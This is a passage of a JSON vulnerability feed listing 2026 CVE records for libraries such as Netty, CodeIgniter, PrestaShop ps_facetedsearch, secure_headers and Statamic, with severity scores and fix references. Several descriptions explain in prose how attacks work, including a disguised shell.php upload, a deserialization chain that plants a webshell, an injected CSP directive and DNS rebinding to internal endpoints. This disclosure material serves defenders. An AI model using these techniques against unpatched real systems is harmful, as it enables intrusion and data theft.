DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"cna@vuldb.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L","baseScore":6.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":2.8,"impactScore":3.4}],"cvssMetricV2":[{"source":"cna@vuldb.com","type":"Secondary","cvssData":{"version":"2.0","vectorString":"AV:N/AC:L/Au:S/C:P/I:P/A:P","baseScore":6.5,"accessVector":"NETWORK","accessComplexity":"LOW","authentication":"SINGLE","confidentialityImpact":"PARTIAL","integrityImpact":"PARTIAL","availabilityImpact":"PARTIAL"},"baseSeverity":"MEDIUM","exploitabilityScore":8.0,"impactScore":6.4,"acInsufInfo":false,"obtainAllPrivilege":false,"obtainUserPrivilege":false,"obtainOtherPrivilege":false,"userInteractionRequired":false}]},"weaknesses":[{"source":"cna@vuldb.com","type":"Primary","description":[{"lang":"en","value":"CWE-918"}]}],"references":[{"url":"https://gist.github.com/YLChen-007/f84070f78d9c9c9407b0c396189cd716","source":"cna@vuldb.com"},{"url":"https://vuldb.com/cve/CVE-2026-16074","source":"cna@vuldb.com"},{"url":"https://vuldb.com/submit/852842","source":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/379789","source":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/379789/cti","source":"cna@vuldb.com"}]}},{"cve":{"id":"CVE-2026-44891","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T21:17:06.250","lastModified":"2026-07-17T21:17:06.250","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"Netty is a network application framework for development of protocol servers and clients. Prior to 4.1.136.Final and 4.2.16.Final, io.netty.handler.codec.stomp.StompSubframeDecoder fails to limit the total number of headers or their cumulative size per frame, and the maxLineLength parameter only restricts individual header lines. An attacker can send a large number of short headers that are accumulated in memory inside DefaultStompHeadersSubframe until the JVM throws an OutOfMemoryError, causing denial of service for servers exposing a STOMP endpoint based on StompSubframeDecoder. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"netty","product":"netty","versions":[{"version":"< 4.1.136.Final","status":"affected"},{"version":">= 4.2.0.Final, < 4.2.16.Final","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":3.6}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-400"},{"lang":"en","value":"CWE-770"}]}],"references":[{"url":"https://github.com/netty/netty/commit/5b68c61f37aa4a3045cba624cbea239655c9003b","source":"security-advisories@github.com"},{"url":"https://github.com/netty/netty/commit/bb2ff68a1fb71cb4b0eb9a9e17b66c52aff680c6","source":"security-advisories@github.com"},{"url":"https://github.com/netty/netty/pull/17063","source":"security-advisories@github.com"},{"url":"https://github.com/netty/netty/pull/17065","source":"security-advisories@github.com"},{"url":"https://github.com/netty/netty/releases/tag/netty-4.1.136.Final","source":"security-advisories@github.com"},{"url":"https://github.com/netty/netty/releases/tag/netty-4.2.16.Final","source":"security-advisories@github.com"},{"url":"https://github.com/netty/netty/security/advisories/GHSA-vhch-2wf3-m8rp","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-45784","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T21:17:06.503","lastModified":"2026-07-17T21:17:06.503","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"rust-openssl provides OpenSSL bindings for the Rust programming language. From 0.10.50 until 0.10.80, CipherCtxRef::cipher_update_inplace in openssl/src/cipher_ctx.rs incorrectly sized output buffers when used with AES key-wrap-with-padding ciphers EVP_aes_{128,192,256}_wrap_pad. For a non-multiple-of-8 input, OpenSSL writes up to 7 bytes past the end of the caller's buffer or Vec, producing attacker-controllable heap corruption when the plaintext length is attacker-influenced. This issue is fixed in version 0.10.80."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"rust-openssl","product":"rust-openssl","versions":[{"version":">= 0.10.50, < 0.10.80","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":5.1,"baseSeverity":"MEDIUM","attackVector":"LOCAL","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"LOW","vulnAvailabilityImpact":"LOW","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-131"},{"lang":"en","value":"CWE-787"}]}],"references":[{"url":"https://github.com/rust-openssl/rust-openssl/commit/19eceb26f2404aae187e5444e65c404ebc1348a7","source":"security-advisories@github.com"},{"url":"https://github.com/rust-openssl/rust-openssl/pull/2638","source":"security-advisories@github.com"},{"url":"https://github.com/rust-openssl/rust-openssl/releases/tag/openssl-v0.10.80","source":"security-advisories@github.com"},{"url":"https://github.com/rust-openssl/rust-openssl/security/advisories/GHSA-phqj-4mhp-q6mq","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-45785","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T21:17:06.650","lastModified":"2026-07-17T21:17:06.650","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"OpenMcdf is a fully .NET / C# library to manipulate Compound File Binary File Format files, also known as Structured Storage. In 3.1.3 and earlier, the BST name-lookup loop in DirectoryTree.TryGetDirectoryEntry (OpenMcdf/DirectoryTree.cs:35-46) walks directory entries by repeatedly calling directories.TryGetSibling(child, siblingType, validateColor). A crafted CFB file with cyclic Left/Right sibling links among directory entries, constructed so the per-step BST-order check in TryGetSibling (DirectoryEntries.cs:84-85) is satisfied at every step, drives this while (child is not null) loop forever. There is no cycle detection in TryGetDirectoryEntry, and the bug is reachable from RootStorage.OpenStorage(name), TryOpenStorage(name), OpenStream(name), and TryOpenStream(name), causing an unrecoverable denial of service. This issue is fixed in version 3.1.4."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"openmcdf","product":"openmcdf","versions":[{"version":"< 3.1.4","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":6.2,"baseSeverity":"MEDIUM","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":2.5,"impactScore":3.6}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-835"}]}],"references":[{"url":"https://github.com/openmcdf/openmcdf/commit/c6f82db722bd85db7b0caed3ca1aa374f1e07bc7","source":"security-advisories@github.com"},{"url":"https://github.com/openmcdf/openmcdf/releases/tag/v3.1.4","source":"security-advisories@github.com"},{"url":"https://github.com/openmcdf/openmcdf/security/advisories/GHSA-5qwm-7pvp-w988","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-48062","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T21:17:06.787","lastModified":"2026-07-17T21:17:06.787","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"CodeIgniter is a PHP full-stack web framework. Prior to 4.7.3, the ext_in upload validation rule in system/Validation/StrictRules/FileRules.php checked the MIME-derived guessed extension instead of the client-provided filename extension. As a result, an uploaded file named shell.php containing GIF-like content could pass validation such as uploaded[avatar]|is_image[avatar]|mime_in[avatar,image/gif]|ext_in[avatar,gif] because the detected MIME type maps to gif, even though the uploaded filename extension is php. Applications are impacted if they accept user-controlled uploads, rely on ext_in to validate the uploaded filename extension, save uploaded files using the original client filename with $file->move($path), store uploads in a web-accessible directory, and allow PHP or other executable files to run from that directory. In those conditions, this may lead to arbitrary code execution. This issue is fixed in version 4.7.3."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"codeigniter4","product":"CodeIgniter4","versions":[{"version":"< 4.7.3","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-434"}]}],"references":[{"url":"https://github.com/codeigniter4/CodeIgniter4/commit/29299349e7d232e9532767c7cefaed30957309be","source":"security-advisories@github.com"},{"url":"https://github.com/codeigniter4/CodeIgniter4/releases/tag/v4.7.3","source":"security-advisories@github.com"},{"url":"https://github.com/codeigniter4/CodeIgniter4/security/advisories/GHSA-2gr4-ppc7-7mhx","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-49977","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T21:17:06.930","lastModified":"2026-07-17T21:17:06.930","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"tarteaucitron.js is a compliant and accessible cookie banner. Prior to 1.33.0, tarteaucitron.cookie.purge() is called on any element with the purgeBtn class and does not check whether the element is a legitimate tarteaucitron button or whether the cookie corresponds to a service handled by tarteaucitron. If an attacker can write HTML with data attributes, an element with data-cookie can silently delete a non-HttpOnly cookie with a known name when clicked by a user. This issue is fixed in version 1.33.0."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"AmauriC","product":"tarteaucitron.js","versions":[{"version":"< 1.33.0","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N","baseScore":4.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":1.4}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-285"}]}],"references":[{"url":"https://github.com/AmauriC/tarteaucitron.js/commit/24b5464400ae2ff1ad96a092c629b9d632b9cc93","source":"security-advisories@github.com"},{"url":"https://github.com/AmauriC/tarteaucitron.js/releases/tag/v1.33.0","source":"security-advisories@github.com"},{"url":"https://github.com/AmauriC/tarteaucitron.js/security/advisories/GHSA-jxj7-g6gm-49j7","source":"security-advisories@github.com"},{"url":"https://www.drupal.org/sa-contrib-2026-040","source":"af854a3a-2127-422b-91ae-364da2661108"}]}},{"cve":{"id":"CVE-2026-50271","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T21:17:07.070","lastModified":"2026-07-17T21:17:07.070","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"Datadog dd-trace-py is the Datadog Python APM client. Prior to 4.8.2, Datadog tracing libraries that implement W3C baggage propagation parse incoming baggage HTTP headers without enforcing DD_TRACE_BAGGAGE_MAX_ITEMS or DD_TRACE_BAGGAGE_MAX_BYTES limits on the extract path. A remote, unauthenticated attacker can send a request whose baggage header contains an arbitrarily large number of comma-separated key-value pairs or a single very large value, causing unbounded CPU and memory consumption and enabling a remote denial of service against HTTP services with baggage propagation enabled. This issue is fixed in version 4.8.2."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"DataDog","product":"dd-trace-py","versions":[{"version":"< 4.8.2","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":3.6}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-770"}]}],"references":[{"url":"https://github.com/DataDog/dd-trace-py/commit/9c80faa3dcfe238d008c3b3cd0b8e5dfef0aa4cd","source":"security-advisories@github.com"},{"url":"https://github.com/DataDog/dd-trace-py/pull/17926","source":"security-advisories@github.com"},{"url":"https://github.com/DataDog/dd-trace-py/releases/tag/v4.8.2","source":"security-advisories@github.com"},{"url":"https://github.com/DataDog/dd-trace-py/security/advisories/GHSA-mw54-j2v2-42hr","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-50272","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T21:17:07.200","lastModified":"2026-07-17T21:17:07.200","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"dd-trace is the Datadog APM client for Node.js. Prior to 5.100.0, W3C baggage propagation in packages/dd-trace/src/baggage.js and packages/dd-trace/src/opentracing/propagation/text_map.js parsed incoming baggage HTTP headers without enforcing DD_TRACE_BAGGAGE_MAX_ITEMS or DD_TRACE_BAGGAGE_MAX_BYTES on extraction. A remote, unauthenticated attacker can send a request whose baggage header contains an arbitrarily large number of comma-separated key-value pairs, or a single very large value, causing unbounded CPU and memory consumption and enabling a remote denial of service against any HTTP service with baggage propagation enabled. This issue is fixed in version 5.100.0."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"DataDog","product":"dd-trace-js","versions":[{"version":"< 5.100.0","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":3.6}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-770"}]}],"references":[{"url":"https://github.com/DataDog/dd-trace-js/commit/a7d4c0da05f67cde05a99272b725a317c461d0e6","source":"security-advisories@github.com"},{"url":"https://github.com/DataDog/dd-trace-js/pull/8255","source":"security-advisories@github.com"},{"url":"https://github.com/DataDog/dd-trace-js/releases/tag/v5.100.0","source":"security-advisories@github.com"},{"url":"https://github.com/DataDog/dd-trace-js/security/advisories/GHSA-wxqq-gcq8-c443","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-50274","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T21:17:07.337","lastModified":"2026-07-17T21:17:07.337","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"Datadog dd-trace-go is a Go client library for Datadog application performance monitoring, profiling, and security monitoring. Prior to 2.8.1, Datadog tracing libraries that implement W3C baggage propagation parse incoming baggage HTTP headers without enforcing DD_TRACE_BAGGAGE_MAX_ITEMS or DD_TRACE_BAGGAGE_MAX_BYTES limits on the extract path. A remote, unauthenticated attacker can send a request whose baggage header contains an arbitrarily large number of comma-separated key-value pairs or a single very large value, causing unbounded CPU and memory consumption and enabling a remote denial of service against HTTP services with baggage propagation enabled. This issue is fixed in version 2.8.1."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"DataDog","product":"dd-trace-go","versions":[{"version":"< 2.8.1","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":3.6}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-770"}]}],"references":[{"url":"https://github.com/DataDog/dd-trace-go/commit/192712ba0291b2e89166259111ebb5e90c8f52df","source":"security-advisories@github.com"},{"url":"https://github.com/DataDog/dd-trace-go/pull/4720","source":"security-advisories@github.com"},{"url":"https://github.com/DataDog/dd-trace-go/releases/tag/v2.8.1","source":"security-advisories@github.com"},{"url":"https://github.com/DataDog/dd-trace-go/security/advisories/GHSA-74j5-xf3v-crq8","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-52203","sourceIdentifier":"cve@mitre.org","published":"2026-07-17T21:17:07.490","lastModified":"2026-07-17T21:17:07.490","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"An issue in MCMS v.6.1.1 allows a remote attacker to obtain sensitive information via the source parameter."}],"affected":[{"source":"cve@mitre.org","affectedData":[{"vendor":"n/a","product":"n/a","versions":[{"version":"n/a","status":"affected"}]}]}],"metrics":{},"references":[{"url":"https://gist.github.com/this1slwl/1bfb6996ca7edf6f5d15b5ebc181f337","source":"cve@mitre.org"}]}},{"cve":{"id":"CVE-2026-52348","sourceIdentifier":"cve@mitre.org","published":"2026-07-17T21:17:07.610","lastModified":"2026-07-17T21:17:07.610","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"cool-admin-java 8.0.0 has a SQL injection vulnerability in the order() method of CrudOption.java."}],"affected":[{"source":"cve@mitre.org","affectedData":[{"vendor":"n/a","product":"n/a","versions":[{"version":"n/a","status":"affected"}]}]}],"metrics":{},"references":[{"url":"https://github.com/cool-team-official/cool-admin-java/issues/19","source":"cve@mitre.org"}]}},{"cve":{"id":"CVE-2026-52584","sourceIdentifier":"cve@mitre.org","published":"2026-07-17T21:17:07.723","lastModified":"2026-07-17T21:17:07.723","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"Buffer Overflow vulnerability in libjxl v.0.11.2 and before allows a local attacker to obtain sensitive information via the DecodeImageAPNG function"}],"affected":[{"source":"cve@mitre.org","affectedData":[{"vendor":"n/a","product":"n/a","versions":[{"version":"n/a","status":"affected"}]}]}],"metrics":{},"references":[{"url":"https://github.com/libjxl/libjxl/issues/4803","source":"cve@mitre.org"},{"url":"https://github.com/libjxl/libjxl/pull/4804","source":"cve@mitre.org"}]}},{"cve":{"id":"CVE-2026-53727","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T21:17:07.837","lastModified":"2026-07-17T21:17:07.837","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"css_parser is a Ruby CSS parser. From 2.2.0 until 3.0.0, CssParser::Parser#read_remote_file in lib/css_parser/parser.rb, and therefore load_uri! and the @import-following branch of add_block!, issued HTTP and HTTPS requests against any host, port, and URI without a scheme allowlist, host or IP filtering, or protection against link-local, loopback, or RFC-1918 addresses. Location: redirects were followed recursively back into the same function, which also serviced file:// URIs, so a single attacker-controlled HTTP redirect could upgrade the bug from SSRF to arbitrary local file disclosure. Any consumer of css_parser that hands it attacker-influenced CSS together with a base_uri: option is exposed. This issue is fixed in version 3.0.0."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"premailer","product":"css_parser","versions":[{"version":"< 3.0.0","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":8.9,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"HIGH","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-918"}]}],"references":[{"url":"https://github.com/premailer/css_parser/commit/7d2ddf0189cd54b54f378f59daefa10cb036e476","source":"security-advisories@github.com"},{"url":"https://github.com/premailer/css_parser/commit/e0a151458b2a801ae265ba420862ef8b1127b3ae","source":"security-advisories@github.com"},{"url":"https://github.com/premailer/css_parser/releases/tag/v3.0.0","source":"security-advisories@github.com"},{"url":"https://github.com/premailer/css_parser/security/advisories/GHSA-9pmc-p236-855h","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-54159","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T21:17:07.963","lastModified":"2026-07-17T21:17:07.963","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"PrestaShop ps_facetedsearch is a module that adds layered navigation filters. From 3.0.0 until 4.0.4, the ps_facetedsearch module rebuilds selected search filters from the request URL, and the value of a slider filter, price or weight, is taken from the URL without sufficient validation and stored in an internal filter-block cache where it is serialized and later read back with a raw native unserialize() in src/Filters/Block.php. By crafting that value, an unauthenticated attacker can smuggle a malicious serialized PHP object into the cache, and when it is deserialized, a gadget chain writes an arbitrary PHP file inside the modules/ps_facetedsearch/ directory, which is then used as a webshell to run commands on the server. This issue is fixed in version 4.0.4."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"PrestaShop","product":"ps_facetedsearch","versions":[{"version":">= 3.0.0, < 4.0.4","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H","baseScore":10.0,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":6.0}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-74"}]}],"references":[{"url":"https://github.com/PrestaShop/ps_facetedsearch/commit/9ca839fac68a60641d8187a3ff9730ab09af33cb","source":"security-advisories@github.com"},{"url":"https://github.com/PrestaShop/ps_facetedsearch/releases/tag/v4.0.4","source":"security-advisories@github.com"},{"url":"https://github.com/PrestaShop/ps_facetedsearch/security/advisories/GHSA-m5f5-28qr-9g9r","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-54163","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T21:17:08.107","lastModified":"2026-07-17T21:17:08.107","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"secure_headers manages application of security headers with many safe defaults. Prior to 7.3.0, secure_headers builds the Content-Security-Policy value by stitching directives with ; separators, and build_sandbox_list_directive, build_media_type_list_directive, and build_report_to_directive interpolate caller-supplied strings without scrubbing ;, \\r, or \\n. When untrusted input reaches SecureHeaders.override_content_security_policy_directives or append APIs for :sandbox, :plugin_types, or :report_to, an attacker can inject a CSP directive such as script-src 'unsafe-inline' * before the legitimate script-src, enabling XSS reachability through these sinks or CSP report exfiltration. This issue is fixed in version 7.3.0."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"github","product":"secure_headers","versions":[{"version":"< 7.3.0","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":4.7,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":1.6,"impactScore":2.7}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-79"},{"lang":"en","value":"CWE-113"}]}],"references":[{"url":"https://github.com/github/secure_headers/commit/286a79dea80c6a9be4ca93e0f284c923cf77e539","source":"security-advisories@github.com"},{"url":"https://github.com/github/secure_headers/releases/tag/v7.3.0","source":"security-advisories@github.com"},{"url":"https://github.com/github/secure_headers/security/advisories/GHSA-rqq5-2gf9-4w4q","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-54242","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T21:17:08.247","lastModified":"2026-07-17T21:17:08.247","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"Statamic is a Laravel and Git powered content management system (CMS). Prior to 5.73.24 and 6.20.1, the Glide image proxy's URL validation in src/Imaging/RemoteUrlValidator.php and src/Imaging/GuzzleAdapter.php could be bypassed using DNS rebinding. The remote hostname was validated as publicly routable, but resolved again when the image was actually fetched, so an attacker controlling the hostname's DNS could rebind it to an internal address after validation and cause the server to make HTTP requests to internal addresses, including loopback, private network, and cloud metadata endpoints. This affects sites that pass user-supplied URLs to Glide. This issue is fixed in versions 5.73.24 and 6.20.1."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"statamic","product":"cms","versions":[{"version":"< 5.73.24","status":"affected"},{"version":">= 6.0.0, < 